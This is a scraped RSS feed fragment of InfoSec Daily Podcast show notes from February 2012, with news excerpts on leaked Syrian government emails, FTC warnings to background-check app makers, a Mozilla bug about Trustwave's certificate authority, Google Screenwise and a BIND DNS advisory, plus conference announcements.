	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hacking group Anonymous claim the documents show how advisers close to the president offer their thoughts on how he should deal with questions from the press amid the government&#39;s on-going military campaign.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One email appears to advise Assad on how to approach his interview with ABC&#39;s Barbara Walters, who spoke to the leader late last year.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">American psyche can be easily manipulated when they hear that there are &#39;mistakes&#39; done and now we are &#39;fixing it&#39;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Mentioning &#39;armed groups&#39; in the interview is extremely important and we can use American and British articles to prove there are armed gangs,&quot; the adviser writes.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The president was also advised to mention the way protests are sometimes handled in western countries, adding that &quot;Syria doesn&#39;t have a policy to torture people, unlike the USA&#8230; We can use Abu Ghraib in Iraq as an example&quot;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sky&#39;s foreign affairs editor Tim Marshal said of the hacking: &quot;The translations of the emails from Arabic to English do not prove that they are what the hackers say, but it would have taken a solid knowledge of how the Syrian government and political public relations works to make them up,&quot; he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The emails are not particularly damaging to the Syrian government, which would mean if forged someone has gone to a lot of effort for little gain.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This suggests they are real, and while not devastating, they throw some light on the government&#39;s thinking.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An email goes on to explain that admitting to errors committed early on may be a good way of shaping public opinion.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.networkworld.com/news/2012/020712-ftc-background-screening-255815.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.networkworld.com/news/2012/020712-ftc-background-screening-255815.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Federal Trade Commission this week said it sent letters to six unidentified mobile applications makers warning them that their background screening apps may be violating federal statutes.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Specifically the FTC said if the app makers have reason to believe their background reporting apps are being used for employment screening, housing, credit, or other similar purposes, they must comply with the Fair Credit Reporting Act which is supposed to protect consumer privacy and ensure that the information supplied by consumer reporting agencies is accurate.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the FTC, some of the apps include criminal record histories, which bear on an individual&#39;s character and general reputation and are precisely the type of information that is typically used in employment and tenant screening.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Under the FCRA, operations that assemble or evaluate information to provide to third parties qualify as consumer reporting agencies, or CRAs. Mobile apps that supply such information may qualify as CRAs under the Act. CRAs must take reasonable steps to ensure the user of each report has a &#39;permissible purpose&#39; to use the report; take reasonable steps to ensure the maximum possible accuracy of the information conveyed in its reports; and provide users of its reports with information about their FCRA obligations. In the case of consumer reports provided for employment purposes, for example, CRAs must provide employers with information regarding their obligation to provide notice to employees and applicants of any adverse action taken on the basis of a consumer report.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the warning letters, the FTC has made no determination whether the companies are violating the FCRA, but encourages them to review their apps and their policies and procedures to be sure they comply with the FCRA. Future actions against those firms weren&#39;t ruled out if violations are found.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The letter reads:</span></p>
<p dir="ltr" style="margin-left: 40.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dear XXX:</span></p>
<p dir="ltr" style="margin-left: 40.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">This letter concerns your company&#39;s mobile application(s) that may be in violation of the Fair Credit Reporting Act (&quot;FCRA&quot;),1 a federal law enforced by the Federal Trade Commission (&quot;FTC&quot;).</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Under the FCRA, a company is a consumer reporting agency (&quot;CRA&quot;) if it assembles or evaluates information on consumers for the purpose of furnishing &quot;consumer reports&quot; to third parties. Consumer reports include information that relates to an individual&#39;s character, reputation or personal characteristics and are used or expected to be used for employment, housing, credit, or other similar purposes. For example, when companies provide information to employers regarding current or prospective employees&#39; criminal histories, they are providing &quot;consumer reports&quot; because the data involves the individuals&#39; character, general reputation, or personal characteristics. Such companies, therefore, are acting as CRAs in this capacity and must comply with the FCRA.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=724929"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://bugzilla.mozilla.org/show_bug.cgi?id=724929</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trustwave issued a subordinate root certificate to a company, therefore enabling the company to issue unlimited SSL certificates for any domain/hostname:<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	</span><a href="http://blog.spiderlabs.com/2012/02/clarifying-the-trustwave-ca-policy-update.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.spiderlabs.com/2012/02/clarifying-the-trustwave-ca-policy-update.html</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	This is a violation of the Mozilla CA Certificate Policy, specifically:<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	We reserve the right to not include a particular CA certificate in our software products. This includes (but is not limited to) cases where we believe that including a CA certificate (or setting its &quot;trust bits&quot; in a particular way) would cause undue risks to users&#39; security, for example, with CAs that<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	&nbsp;&nbsp;&nbsp;knowingly issue certificates without the knowledge of the entities whose information is referenced in the certificates; or<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	I therefore request the root certificate(s) of Trustwave to be removed from the CA store of all Mozilla products.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	I know that they made this public and stated that they won&#39;t do it again but I can&#39;t place any trust in their certificates any more and I think this should serve as an example that CAs who have these business practices or had them in the past should not be included in products used (and trusted) by so many people.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/gadgets/news/2012/02/google-paying-users-to-track-100-of-their-web-usage-via-little-black-box.ars?src=fbk"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/gadgets/news/2012/02/google-paying-users-to-track-100-of-their-web-usage-via-little-black-box.ars</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google is working to collect information about Internet users that it can&#39;t get from just monitoring its own browser, services, and Android devices. The company has set up a new program called Screenwise, which offers money to users who install a black box on their home network to &quot;measure Internet use.&quot; A smaller amount of money will go to those who install a browser extension on their computers that will do the same thing.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google quietly started up the Screenwise data collection program Tuesday night, taking the e-mail addresses of people who are interested in &quot;add[ing] a browser extension that will share with Google the sites you visit and how you use them.&quot; For their participation, Google offers the extension users a $5 Amazon gift card for signing up and another $5 gift card for every three months they stay with the program. Less publicly, Google also started looking for people who would install a piece of hardware on their network to do more extensive monitoring. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-591-revoked-yet-still-resolvable-assad-ftc-trustwave-blackbox-friday/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3492/0/infosec-daily-podcast-episode-591.mp3" length="18855061" type="audio/mpeg" />
		<itunes:duration>0:39:14</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 591 for February 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad S[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 591 for February 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: https://www.isc.org/software/bind/advisories/cve-2012-1033
	ISC has been notified by Haixin Duan (a professor at Tsinghua University in Beijing China, who is currently visiting the International Computer Science Institute (ICSI) at the University of California, Berkeley) about a DNS resolver vulnerability. This vulnerability allows a miscreant to keep a domain name in the cache even after it has been deleted from registration and effects all versions of BIND 9. &#160;
	Tsinghua University researchers discovered &#34; a vulnerability affecting the large majority of popular DNS implementations which allows a malicious domain name to stay resolvable long after it has been removed from the upper level servers.&#34; The issue, which is in all versions of BIND 9 to our knowledge, &#34;exploits a vulnerability in DNS cache update policy, which prevents effective domain name revocation. Attackers could cause a malicious domain name to be continuously resolvable even after the delegated data has been deleted from the domain registry and after the TTL associated with entry supposedly expires.&#34; (quoted sections are from the Tsinghua University research document)
	&#8230;.
	Source: http://news.sky.com/home/world-news/article/16164146
	The Syrian government&#39;s computer system has reportedly been hacked, to reveal private memos, documents and emails apparently advising President Bashar al Assad on how to tackle reactions to his crackdown on protesters.
	Hacking group Anonymous claim the documents show how advisers close to the president offer their thoughts on how he should deal with questions from the press amid the[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 590 &#8211; Cell Cloning, Marriott Hacker, Anonymous, Irish DSL Modems &amp; BostonPD</title>
		<link>http://www.isdpodcast.com/episode-590-cell-cloning-marriott-hacker-anonymous-irish-dsl-modems-bostonpd</link>
		<comments>http://www.isdpodcast.com/episode-590-cell-cloning-marriott-hacker-anonymous-irish-dsl-modems-bostonpd#comments</comments>
		<pubDate>Fri, 10 Feb 2012 01:52:57 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3485</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 590 for February 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.19364790542607557" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 590 for February 9, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://blog.dhs.gov/2012/02/secret-service-investigates.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.dhs.gov/2012/02/secret-service-investigates.html</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On February 1, the U.S. Attorney for the Southern District of New York announced charges against 12 defendants for participating in a $250 million cell phone cloning scheme.</span><br />
